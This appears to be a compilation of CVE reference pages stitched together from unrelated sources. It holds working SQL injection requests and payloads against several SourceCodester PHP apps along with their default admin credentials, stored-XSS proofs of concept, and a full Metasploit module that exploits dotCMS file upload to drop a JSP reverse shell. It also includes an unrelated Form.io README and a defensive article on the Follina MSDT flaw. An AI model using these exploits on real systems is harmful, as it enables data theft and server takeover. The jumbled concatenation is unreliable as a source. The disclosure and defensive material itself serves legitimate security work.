ChatBot App with Suggestion v1.0 is vulnerable to SQL Injection via /simple_chat_bot/admin/?page=responses/manage_response&id=.

**ChatBot App with Suggestion v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html

Vulnerability File: /simple\_chat\_bot/admin/?page=responses/manage\_response&id=

Vulnerability location: /simple\_chat\_bot/admin/?page=responses/manage\_response&id=, id

\[+\] Payload: /simple\_chat\_bot/admin/?page=responses/manage\_response&id=8%27%20and%20length(database())%20=11--+ // Leak place ---> id

Current database name: chat\_bot\_db,length is 11

GET /simple\_chat\_bot/admin/?page\=responses/manage\_response&id\=8%27%20and%20length(database())%20\=11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close

When length (database ()) = 10, Content-Length: 30013 

When length (database ()) = 11, Content-Length: 30708

CVE-2022-31970: bug_report/SQLi-4.md at main · k0xx11/bug_report

Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_inquiry.

Permalink

Cannot retrieve contributors at this time

**Online Fire Reporting System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html

Vulnerability File: /ofrs/classes/Master.php?f=delete\_inquiry

Vulnerability location: /ofrs/classes/Master.php?f=delete\_inquiry, id

\[+\] Payload: id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /ofrs/classes/Master.php?f\=delete\_inquiry HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-31978: bug_report/SQLi-5.md at main · k0xx11/bug_report

Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=user/manage_user&id=.

**Online Fire Reporting System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html

Vulnerability File: /ofrs/admin/?page=user/manage\_user&id=

Vulnerability location: /ofrs/admin/?page=user/manage\_user&id=, id

\[+\] Payload: /ofrs/admin/?page=user/manage\_user&id=-6%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11--+ // Leak place ---> id

GET /ofrs/admin/?page\=user/manage\_user&id\=\-6%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close

CVE-2022-31975: bug_report/SQLi-2.md at main · k0xx11/bug_report

ChatBot App with Suggestion v1.0 is vulnerable to SQL Injection via /simple_chat_bot/admin/?page=user/manage_user&id=.

**ChatBot App with Suggestion v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html

Vulnerability File: /simple\_chat\_bot/admin/?page=user/manage\_user&id=

Vulnerability location: /simple\_chat\_bot/admin/?page=user/manage\_user&id=, id

\[+\] Payload: /simple\_chat\_bot/admin/?page=user/manage\_user&id=-4%27%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ // Leak place ---> id

GET /simple\_chat\_bot/admin/?page\=user/manage\_user&id\=\-4%27%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close

CVE-2022-31969: bug_report/SQLi-1.md at main · k0xx11/bug_report

Missing input validation in internal/db/repo_editor.go in Gogs before 0.12.8 allows an attacker to execute code remotely. An unprivileged attacker (registered user) can overwrite the Git configuration in his repository. This leads to Remote Command Execution, because that configuration can contain an option such as sshCommand, which is executed when a master branch is a remote branch (using an ssh:// URI). The remote branch can also be configured by editing the Git configuration file. One can create a new file in a new repository, using the GUI, with "\" as its name, and then rename this file to .git/config with the custom configuration content (and then save it).

CVE-2021-32546: Releases · gogs/gogs

Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports&date=.

**Online Fire Reporting System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html

Vulnerability File: /ofrs/admin/?page=reports&date=

Vulnerability location: /ofrs/admin/?page=reports&date=, date

\[+\] Payload: /ofrs/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,database(),5,6,7,8,9,10--+ // Leak place ---> date

GET /ofrs/admin/?page\=reports&date\=2022\-05\-27%27%20union%20select%201,2,3,database(),5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close

CVE-2022-31974: bug_report/SQLi-1.md at main · k0xx11/bug_report

A Server-Side Template Injection (SSTI) was discovered in Form.io 2.0.0. This leads to Remote Code Execution during deletion of the default Email template URL.

 

**A combined form and API platform for Serverless applications**

Form.io is a revolutionary combined Form and API platform for Serverless applications. This repository serves as the core Form and API engine for https://form.io. This system allows you to build "serverless" data management applications using a simple drag-and-drop form builder interface. These forms can then easily be embedded within your Angular.js and React applications using the <formio> HTML element.

**Form.io is Hiring!**

If you like what you see, and would like to come and work for a cutting edge, Open Source core company, then please apply online @ https://form-talent.freshteam.com/jobs!

**Walkthrough video and tutorial**

For a walkthrough tutorial on how to use this Open Source platform to build a Serverless application, watch the video 0 to M.E.A.N in 30 minutes

**Form Building & Rendering Demo**

Here is a link to a demo of the Form Building and Form Rendering capability that can be hooked into this API platform.

http://codepen.io/travist/full/xVyMjo/

**Run with Docker Compose**

The fastest way to run this library locally is to use Docker.

*   Install Docker
    
*   Download and unzip this package to a local directory on your machine.
    
*   Open up your terminal and navigate to the unzipped folder of this library.
    
*   Type the following in your terminal
    
        npm install
        docker-compose up
        
    
*   Go to the following URL in your browser.
    
*   Use the following credentials to login.
    
    *   **email**: admin@example.com
    *   **password**: CHANGEME
*   To change the admin password.
    
    *   Once you login, click on the **Admin** resource
    *   Click **View Data**
    *   Click on the **admin@example.com** row
    *   Click **Edit Submission**
    *   Set the password field
    *   Click **Save Submission**
    *   Logout
*   Have fun!
    

**Manual Installation (Node + MongoDB)**

To get started you will first need the following installed on your machine.

*   Node.js - https://nodejs.org/en/
*   MongoDB - http://docs.mongodb.org/manual/installation/
    *   On Mac I recommend using Homebrew brew install mongodb-community
    *   On Windows, download and install the MSI package @ https://www.mongodb.org/downloads
*   You must then make sure you have MongoDB running by typing mongod in your terminal.

**Running with Node.js**

You can then download this repository, navigate to the folder in your Terminal, and then type the following.

This will walk you through the installation process. When it is done, you will have a running Form.io management application running at the following address in your browser.

The installation process will also ask if you would like to download an application. If selected, the application can be found at the following URL.

You can also see the contents of the application (for modification) within the app folder which exists inside of the folder where you downloaded this repository.

**Development**

To start server with auto restart capability for development simply run this command:

**Deploy to Hosted Form.io**

If you wish to deploy all of your forms and resources into the Form.io Hosted platform @ https://portal.form.io, you can do this by using the Form.io CLI command line tool.

    npm install -g formio-cli
    

Once you have this tool installed, you will need to follow these steps.

*   Create a new project within Form.io
*   Create an API Key within this project by going to the **Project Settings | Stage Settings | API Keys**
*   Next, you can execute the following command to deploy your local project into Hosted Form.io.

    formio deploy http://localhost:3001 https://{PROJECTNAME}.form.io --dst-key={APIKEY}
    

You will need to make sure you replace {PROJECTNAME} and {APIKEY} with your new Hosted Form.io project name (found in the API url), as well as the API key that was created in the second step above.

This will then ask you to log into the local Form.io server (which can be provided within the Admin resource), and then after it authenticates, it will export the project and deploy that project to the Form.io hosted form.

**License Change (March 8th, 2020)**

This library is now licensed under the OSL-v3 license, which is a copy-left OSI approved license. Please read the license @ https://opensource.org/licenses/OSL-3.0 for more information. Our goal for the change to OSLv3 from BSD is to ensure that appropriate Attribution is provided when creating proprietary products that leverage or extend this library.

**Help**

We will be updating the help guides found @ https://help.form.io as questions arise and also to help you get started with Form.io.

Thanks for using Form.io!

The Form.io Team.

**Security**

If you find and/or think you have found a Security issue, please quietly disclose it to security@form.io, and give us sufficient time to patch the issue before disclosing it publicly.

CVE-2020-28246: GitHub - formio/formio: A Form and Data Management Platform for Progressive Web Applications.

Product Show Room Site version 1.0 suffers from multiple persistent cross site scripting vulnerabilities.

    # Product Show Room Site - 'Telephone' Stored Cross-Site Scripting(XSS)   #### Exploit Title: Product Show Room Site - 'Telephone' Stored Cross-Site Scripting(XSS)#### Exploit Author: webraybtl@webray.com.cn inc#### Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html#### Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code#### Version: Product Show Room Site 1.0#### Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql#### DescriptionPersistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in the generation of stored XSS.#### Payload used:`<script>alert(111)</script>`#### Proof of Concept1. Login the CMS. Default Admin AccessUsername: adminPassword: admin1231. Open Page http://172.24.5.107/psrs/admin/?page=system_info/contact_info and click View button2. Put XSS payload  (`<script>alert(111)</script>`) in the Telephone box and click on Update to publish the page   ![image](https://user-images.githubusercontent.com/60683449/171591851-2068eea2-b789-464f-8afb-9f6b6f8eaedd.png)    3. Open http://172.24.5.107/psrs/?p=contact,Viewing the successfully published page,We can see the alert.   ![image](https://user-images.githubusercontent.com/60683449/171591881-2962a429-f2de-4979-8e27-6fdd8f62c61c.png)-------# Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)   #### Exploit Title: Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)#### Exploit Author: webraybtl@webray.com.cn inc#### Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html#### Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code#### Version: Product Show Room Site 1.0#### Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql#### DescriptionPersistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in the generation of stored XSS.#### Payload used:`<script>alert(111)</script>`#### Proof of Concept1. Login the CMS. Default Admin AccessUsername: adminPassword: admin1231. Open Page http://172.24.5.107/psrs/?p=contact 2. Put XSS payload  (`<script>alert(111)</script>`) in the Message box and click on Send Message to publish the page  ![image](https://user-images.githubusercontent.com/60683449/171591580-cc3ca01c-9e37-4e05-9351-4b9d7c7749df.png)  ![image](https://user-images.githubusercontent.com/60683449/171591599-be5e8d7f-1d95-43ad-875a-9884f7052fa6.png)   4. Open http://172.24.5.107/psrs/admin/?page=inquiries,Viewing the Top 1 of Inquiries  page,We can see the alert.  ![image](https://user-images.githubusercontent.com/60683449/171591660-c12ce9ac-aab1-45e9-b99f-7514dd28f698.png)

Product Show Room Site 1.0 Cross Site Scripting

When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the file down in a temporary directory. In the case of this vulnerability, dotCMS does not sanitize the filename passed in via the multipart request header and thus does not sanitize the temporary file's name. This allows an attacker to use a specially crafted request to POST files to dotCMS via the ContentResource API that gets written outside of the dotCMS temporary directory. In the case of this exploit, an attacker can upload a specially crafted .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'DotCMS RCE via Arbitrary File Upload.',        'Description' => %q{          When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the          file down in a temp directory.  In the case of this vulnerability, dotCMS does not sanitize the filename          passed in via the multipart request header and thus does not sanitize the temp file's name.  This allows a          specially crafted request to POST files to dotCMS via the ContentResource (POST /api/content)  that get          written outside of the dotCMS temp directory.  In the case of this exploit, an attacker can upload a special          .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.        },        'Author' => [          'Shubham Shah',  # Discovery and analysis          'Hussein Daher', # Discovery and analysis          'jheysel-r7'     # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2022-26352'],          ['URL', 'https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/']        ],        'Privileged' => false,        'Platform' => %w[linux win],        'Targets' => [          [            'Java Linux',            {              'Arch' => ARCH_JAVA,              'Platform' => 'linux'            }          ],          [            'Java Windows',            {              'Arch' => ARCH_JAVA,              'Platform' => 'win'            }          ]        ],        'DisclosureDate' => '2022-05-03',        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options([      Opt::RPORT(8443),      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def check    test_content = Rex::Text.rand_text_alpha(10)    test_file = "#{test_content}.jsp"    test_path = "../../#{test_file}"    uuid = Faker::Internet.uuid    jsp = <<~EOS      <%@ page import=\"java.io.File\" %>      <%        File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{test_file}");        jsp.delete();      %>      #{uuid}    EOS    vars_form_data = [      {        'name' => 'name',        'data' => jsp,        'encoding' => nil,        'filename' => test_path,        'mime_type' => 'text/plain'      }    ]    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/api/content/'),      'vars_form_data' => vars_form_data    )    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, test_file.to_s)    )    if res && res.body.include?(uuid)      return Exploit::CheckCode::Vulnerable    end    Exploit::CheckCode::Safe  end  def write_jsp_payload    jsp_path = "../../#{jsp_filename}"    print_status('Writing JSP payload')    vars_form_data = [      {        'name' => 'name',        'data' => payload.encoded,        'encoding' => nil,        'filename' => jsp_path,        'mime_type' => 'text/plain'      }    ]    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/api/content/'),      'vars_form_data' => vars_form_data    )    unless res&.code == 500      fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')    end    register_file_for_cleanup("../webapps/ROOT/#{jsp_filename}")    print_good('Successfully wrote JSP payload')  end  def execute_jsp_payload    jsp_uri = normalize_uri(target_uri.path, jsp_filename)    print_status('Executing JSP payload')    res = send_request_cgi(      'method' => 'GET',      'uri' => jsp_uri    )    unless res&.code == 200      fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')    end    print_good('Successfully executed JSP payload')  end  def exploit    write_jsp_payload    execute_jsp_payload  end  def jsp_filename    @jsp_filename ||= "#{rand_text_alphanumeric(8..16)}.jsp"  endend

dotCMS Shell Upload

Although organizations should perform proper risk analysis and patch as soon as practical after there's a fix for this vulnerability, defenders still have options before that's released.

On May 27, 2022, researchers from Japan-based nao\_sec identified a malicious document in a commercial malware repository, dubbed "Follina," that revealed the document employed a novel technique to achieve code execution. \[Note: Read Dark Reading's earlier coverage on Follina.\] While referencing a remote object, similar to techniques like template injection, the document retrieves the following URL:

_hXXps://www.xmlformats\[.\]com/office/word/2022/wordprocessingDrawing/RDF842l.html!_

When still active, the URL hosted content that included follow-on code to execute PowerShell via an explicit call to the application "ms-msdt":

    

MSDT is a diagnostic tool included in Windows. As shown above, MSDT can be used to parse and execute code, such as PowerShell, and can be called through parsing a malicious resource. Abuse of MSDT isn't new, as the technique previously has been documented among known "living off the land" binary (LOLBins) abuse. However, its use via a URL redirection called from Microsoft Office was previously unknown, expanding scope of potential MSDT abuse to remote mechanisms.

Since initial reporting, Microsoft issued CVE-2022-30190 to cover this remote code execution (RCE) possibility within MSDT when called through another application. While a patch for this vulnerability has not yet been released, several mitigation strategies exist (covered in greater detail below).

As of this writing, actual abuse of this technique appears to be limited, but with examples dating back to as early as April 2022. Public disclosure and researcher notes identify only a few instances of malicious use of MSDT via Microsoft Office applications. However, since public identification, multiple proofs of concept for this technique emerged, and Gigamon Applied Threat Research (ATR) anticipates that multiple threat actors will soon incorporate this technique into operations.

**Impact**

At present, the impact of CVE-2022-30190 is largely notional given lack of identified widespread use by threat actors. Once this technique is absorbed into existing actor toolkits, however, circumstances will change, with the potential for use by multiple threat actors. On initial discovery, endpoint detection and response (EDR) solutions appeared largely blind to this execution mechanism, but as of this writing that is rapidly changing across multiple vendors and products. Furthermore, as explained in guidance from Microsoft, MSDT's capability to launch items as links can be disabled via changes to the Windows Registry, removing this intrusion vector (with the potential for unforeseen or undesired consequences) until a true patch is available.

More importantly, while much initial discussion focused on the Office mechanism for triggering this issue, CVE-2022-30190 is application-agnostic in functionality, which centers on passing code to MSDT for execution. While Office represents an obvious mechanism to reach this application through delivery of a document via phishing or malicious link, any mechanism of launching MSDT will work to enable follow-on RCE such as a malicious LNK file or via the implementation of "wget" in Windows. The Office route presents just one of many potential avenues for exploitation, with other possibilities of MSDT abuse publicly documented.

For defenders and end users, the risk is therefore not just a new malicious Office delivery vector but, rather, abuse of an internal Windows component (MSDT) for code execution via multiple potential vectors. As such, certain mitigations (such as stopping all child processes from Office applications) represent only partial fixes to one aspect of the problem. To appropriately determine the scope and risk of this scenario, defenders must orient how MSDT abuse, irrespective of vector, applies to adversary operations.

**Orienting to Adversary Operations**

As documented thus far, MSDT is leveraged in early phases of adversary operations as an initial access mechanism to victim machines. As noted by other researchers, MSDT abuse via Office results in follow-on execution with the same privileges as the active user. This is helpful if victims are running as unprivileged users, but given the wealth of mechanisms available to elevate privileges in Windows environments, this limitation would appear to be easily overcome by most adversaries.

However, even if an adversary can access and elevate privileges to a victim device, this specific action represents only one, relatively early step in the overall adversary life cycle, or "kill chain." Appropriately leveraging this vulnerability still requires follow-on actions, including command and control (C2) and lateral movement activity, that present options to defenders for identifying adversary operations. Furthermore, there are precursor actions to code execution via MSDT that defenders can leverage to identify suspicious behaviors leading to exploitation.

Overall, CVE-2022-30190 represents a concern, but only one of many potential avenues available to adversaries to achieve initial code execution in victim environments. By properly understanding how adversaries employ this technique and what are necessary pre- and post-exploit actions to achieve adversary objectives, defenders can begin identifying detection, response, and hunting strategies that work against multiple potential intrusion vectors.

**Detection and Mitigation Possibilities**

1.  **Focus on patching and host-based responses.** The initial security community focus for MSDT abuse mitigation focused on patching (or the inability to do so) and host-based responses. As a host-focused exploitation mechanism, such an approach appears reasonable, and patching will be the most effective way of addressing this specific security issue. Additionally, process parent-child relationship monitoring (or outright blocking) can significantly reduce attack surface by preventing entire categories of intrusion, such as Office or MSDT spawning child processes. Specifically unregistering the URI handler for MSDT in the Windows Registry, as outlined by Microsoft and security researchers, may also temporarily address the issue.
2.  **Look for pre- and post-exploitation activity.** As noted in the previous section though, defenders should strive for detections and mitigations that can apply irrespective of specific exploits by looking at required adversary actions pre- and post-exploitation. For example, in the case of CVE-2022-30190, current delivery mechanisms focus on Office implementations. Likely future implementations will probably expand to other file formats commonly distributed via email or malicious websites, such as LNK files, self-extracting archives, and optical disk images. Identifying and increasing visibility over these distribution pathways, limiting exposure to unknown or untrusted vectors, and similar actions may thus reduce attack surface against multiple types of delivery mechanisms that can be used for payloads beyond MSDT exploitation.
3.  **Identify potential C2 or lateral movement mechanisms**. Post-exploitation, various opportunities exist for identifying C2 or lateral movement mechanisms even if initial exploitation is missed. Following initial access, threat actors will in most cases need to migrate to other areas of the network: repositories of intellectual property or sensitive information, or critical network infrastructure such as domain controllers. The actions required to do so — such as enumerating Active Directory or remote process execution — present opportunities even without host monitoring to identify adversary operations.
4.  **Identify and classify network assets.** Further actions, such as identifying and (if possible) classifying newly observed network items (IP addresses and domain names) may allow for disclosure of unique C2 items. Where appropriate asset identification is enabled, identifying odd network traffic to new, unusual remote resources can further enable defenders to catch and categorize potentially malicious activity. Identifying unusual traffic based on User Agent strings when visible — such as a PowerShell-based User Agent string retrieving an executable file based on file MIME type or extension, as seen in the initial CVE-2022-30190 example — can further enhance visibility into insecure or undesirable network behaviors.

Overall, a variety of options remain available to network defenders even if the actual exploitation of a new, potentially unknown (or "zero-day") vulnerability takes place. Understanding one's own network and its characteristics combined with sufficient visibility into network and host behaviors allows defenders to ask (and answer) questions concerning activities of interest to flag the necessary preconditions and follow-on actions adhering to vulnerability exploitation. While not necessarily easy in all cases, proper investment in resources and people will allow organizations to achieve a redundant security posture capable of catching zero-day exploitation, supply chain intrusions, or state-sponsored attacks.

**Conclusion**

Software and application vulnerabilities are a continuous and ongoing problem in the information security space. CVE-2022-30190 represents just another example of such vulnerabilities that have the potential to facilitate adversary operations. While organizations should perform proper risk analysis and patch as soon as practical once there's a fix for this vulnerability, defenders are not lost prior to release.

Instead, by understanding how adversaries leverage exploits as part of the intrusion life cycle, defenders and network owners can structure detections and defense so that they are agnostic to specific vulnerabilities. Rather than continuously chasing specific weaknesses as they appear over time, such as specific defenses around CVE-2022-30190 weaponization, defenders can structure operations to look for necessary precursors to exploit development (reconnaissance, delivery) or required follow-on actions to achieve objectives (C2, lateral movement).

In building defense and response this way — focused on core behaviors and adversary dependencies — defenders can build a more sustainable security posture that can adapt to future, yet-to-be-discovered vulnerabilities along with current, known tradecraft. Through layering behavior-based detections along with patching, signatures, and other items, defenders can achieve the requisite defense-in-depth necessary to adapt to a dynamic threat environment, without relying on single-point-of-failure defenses easily evaded by capable adversaries.

Tag

#windows